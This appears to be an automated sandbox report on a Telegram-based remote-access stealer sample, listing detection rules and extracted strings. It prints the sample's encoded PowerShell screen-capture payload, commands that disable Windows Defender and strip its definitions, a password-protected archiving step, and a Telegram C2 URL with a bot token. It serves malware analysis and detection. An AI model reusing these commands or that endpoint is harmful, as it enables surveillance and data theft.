JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2816, TargetFilename: C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8032, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *, ProcessId: 648, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7596, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7704, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7692, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Suricata Signatures

ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T05:57:40.975494+0100	2857751	1	A Network Trojan was detected	192.168.2.4	49760	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: HX Design.exe.7524.1.memstrmin

Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendMessage"}

Multi AV Scanner detection for submitted file

Source: HX Design.exe	Virustotal: Detection: 50%			Perma Link
Source: HX Design.exe	ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe

Code function: 73_2_00007FF77D20901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

73_2_00007FF77D20901C

Source: HX Design.exe

Static PE information: certificate valid

Source: HX Design.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672807365.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1669865054.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: HX Design.exe, 00000001.00000002.2108765974.00007FFE01424000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669477724.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671566567.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672348988.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670566316.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672433558.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670164178.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672257497.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: HX Design.exe, 00000001.00000002.2110666490.00007FFE11501000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672348988.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670867826.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669276073.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1673117684.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670767468.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671919991.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: HX Design.exe, 00000001.00000002.2110062071.00007FFE1025B000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: >c.pdb source: powershell.exe, 00000028.00000002.1946049803.000001D19A990000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671060451.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669771704.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: HX Design.exe, 00000001.00000002.2106827061.00007FFDFB868000.00000040.00000001.01000000.00000005.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672257497.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669963061.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1673117684.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669673863.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670069107.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671566567.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1671427459.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670767468.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HX Design.exe, 00000000.00000003.1667874865.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2113107108.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1670483179.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671253398.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672984815.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: HX Design.exe, 00000000.00000003.1670955519.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669477724.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670376660.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670483179.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670667043.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: HX Design.exe, 00000001.00000002.2111613092.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671162659.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.pdbhP8 source: powershell.exe, 00000028.00000002.1879970672.000001D183AA6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669276073.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672711559.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1673205368.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670262264.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671342461.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671162659.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672433558.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672984815.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: HX Design.exe, 00000001.00000002.2109362535.00007FFE0E15E000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672530678.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670566316.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672894743.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: HX Design.exe, 00000001.00000002.2104758778.00007FFDFB152000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HX Design.exe, 00000000.00000003.1667874865.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2113107108.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672006597.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670164178.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671342461.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672623593.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
